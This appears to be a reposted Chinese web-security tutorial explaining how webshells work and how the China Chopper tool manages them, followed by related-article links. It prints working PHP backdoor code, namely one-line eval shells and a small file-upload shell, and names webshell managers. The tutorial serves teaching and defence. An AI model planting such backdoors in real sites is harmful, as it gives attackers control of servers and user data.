web安全第四天:webshell原理与菜刀使用

这篇具有很好参考价值的文章主要介绍了web安全第四天:webshell原理与菜刀使用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

webshell原理

1.1 WebShell的含义

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

1.2 WebShell的优点

WebShell最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过8O0端口传递的,因此不会被防火墙拦截。并且使用WebShell一般不会在系统日志中留下记录只会在网站的web日志中 留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

1.3 WebShell的分类

WebShell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。跟随时代和技术的变迁,国外也有用python编写的脚本木马,不过国内常用的无外乎三种,大马,小马,一句话木马,具体使用场景和特点如下图:
菜刀连接webshell,php,开发语言

1.3.1一句话木马

代码简短,通常只有一行代码,使用方便。
PHP: <?php eval($_GET[pass]);?>

菜刀连接webshell,php,开发语言

1.3.2 小马

只包含文件上传功能,体积小。

< ?php
@$temp = $_FILES[ ' upload_file'][ 'tmp_name ' ];
@$file = basename($_FILES[ ' upload_file' ][ 'name ' ]);
if ( empty ($file) ){
	echo "<form action = '' method = 'POST'ENCTYPE='multipart/form-data'>\n";
	echo "Local file: <input type = 'file' name = 'upload_file ' >\n";
	echo "<input type = 'submit' value = 'upload ' > \n";
	echo "</form> \n<pre> \n\n</pre>" ;
}else {
	if(move_uploaded_file($temp , $file)){
		echo "File uploaded successfully.<p> \n"}
	else {
		echo "Unable to upload " . $file . ".<p>n"; }
		}?>
1.3.3 大马

体积大,包含很多功能,代码通常会进行加密隐藏。
菜刀连接webshell,php,开发语言

1.4 WebShell原理抛析

首先我们先看一个原始而又简单的php一句话木马:

<?php @eval($_POST['a']);?>

(1) php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。

(2)@符号的意思是不报错,即使执行错误,也不报错。

(3)为什么密码是a呢?
php里面几个超全局变量:$_GET、$_POST就是其中之一。$_POST[a];的意思就是a这个变量,用post的方法接收。

(4)如何理解eval()函数?
eval()把字符串作为PHP代码执行。
例如: eval(“echo 'a”");其实就等于直接echo ‘a’;再来看看<?php eval($_POST[a'); ?>首先,用post方式接收变量a,比如接收到了: a=echo 'a;这时代码就变成<?php eval("echo 'a';"); ?>。结果如下:

菜刀连接webshell,php,开发语言

1.2.1 WebShell管理工具的诞生

攻击者在入侵网站时,通常要通过各种方式写入WebShell,从而获得服务器的控制权限,比如执行系统命令.读取配置文件、窃取用户数据,篡改网站页面等操作。为了方便对这些WebShell进行管理,就诞生了各种各样的WebShell管理工具。

菜刀原理

2.1菜刀工作原理

以虚拟终端执行命令
菜刀连接webshell,php,开发语言

常见webshell管理工具

3.1中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
项目地址: https:/lgithub.com/AntSwordProject/AntSword-Loader

3.2冰蝎

冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES, php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。
项目地址: https://github.com/rebeyond/Behinder

3.3哥斯拉

护网期间,各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具,名为“哥斯拉”。
项目地址: https://github.com/BeichenDream/Godzilla文章来源地址https://www.toymoban.com/news/detail-738644.html

到了这里,关于web安全第四天:webshell原理与菜刀使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 菜刀、蚁剑以及冰蝎三款Webshell管理工具简介

    今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 当前,在

    2024年02月06日
    浏览(41)
  • webshell管理工具的流量特征分析(菜刀、蚁剑、冰蝎、哥斯拉)

    目录 写在前面 菜刀 蚁剑  冰蝎  冰蝎2.0 冰蝎3.0  冰蝎4.0  哥斯拉  菜刀、蚁剑、冰蝎、哥斯拉是常见的webshell管理工具。在攻防演练中,了解其常见webshell管理工具的流量特征对防守方来说十分重要。常见的webshell也在不断发展以绕过安全设备waf的检测,其流量特征也在不断

    2024年02月13日
    浏览(27)
  • 渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析

    在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访

    2024年02月16日
    浏览(22)
  • 二进制加密PHP Webshell原理及简单实现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是二进制加密PHP Webshell原理及简单实现。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 为了躲避WAF、杀软

    2023年04月09日
    浏览(34)
  • 网络安全02--负载均衡下的webshell连接

    目录 一、环境准备 1.1ubentu虚拟机一台,docker环境,蚁剑 1.2环境压缩包(文件已上传资源): 二、开始复原 2.1上传ubentu: 2.2解压缩 2.3版本20没有docker-compose手动下载,包已上传资源 ​编辑 2.4问题:下载无法连接 2.5解决方法:ubentu上做代理,或xftp自己上传,我这里使用ub

    2024年02月19日
    浏览(27)
  • CTF-Crypto学习记录-第四天 “ “ --- SHA1安全散列算法,实现原理。

    MD5学习MD5加密算法 SHA-1(Secure Hash Algorithm1,安全散列算法1)是一种密码散列函数。 SHA-1可以生成一个被称为消息摘要的160位(20字节)散列值,散列值通常的呈现形式为40个十六进制数。 SHA-1的历史: 2005年,密码分析人员发现了对SHA-1的有效攻击方法,这表明该算法可能不够

    2024年02月07日
    浏览(31)
  • Webshell免杀-PHP

            在很多渗透测试利用的过程中,渗透人员会通过上传webshell的方式来获取目标服务器的权限。然而及时webshell文件能够正常上传,后续有可能会被管理员当作木马文件删除,上传的过程中也会被安全设备拦截,因此对webshell文件进行免杀操作是不可或缺的。本处仅对

    2023年04月25日
    浏览(47)
  • web安全php基础_搭建php环境

    首先打开phpstudy的网站栏点击创建网站,新建一个网站(域名随便输反正是局域网)然后点击确认 如下,网站便创建好了 打开浏览器输入刚刚创建网站时输入的域名,即可看见我们的网站 然后网站好了,就可以新建项目,打开phpstorm,然后点击new project新建项目, 然后在loca

    2024年02月13日
    浏览(52)
  • web安全php基础_php数据类型

    PHP 支持以下几种数据类型: String(字符串) Integer(整型) Float(浮点型) Boolean(布尔型) Array(数组) Object(对象) NULL(空值) Resource(资源类型) PHP 字符串 一个字符串是一串字符的序列,就像 “Hello world!”。 可以将任何文本放在单引号和双引号中: 执行效果如下

    2024年02月12日
    浏览(41)
  • Web安全——PHP基础

    PHP (全称: PHP : Hypertext Preprocessor ,即\\\" PHP : 超文本预处理器 \\\")是一种通用 开源脚本语言 。 在一个php文件中可以包括以下内容: PHP 文件可包含文本、 HTML 、 JavaScript 代码和 PHP 代码 PHP 代码 在服务器上执行 ,结果以纯 HTML 形式返回给浏览器 PHP 文件的 默认文件扩展名

    2024年02月11日
    浏览(57)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包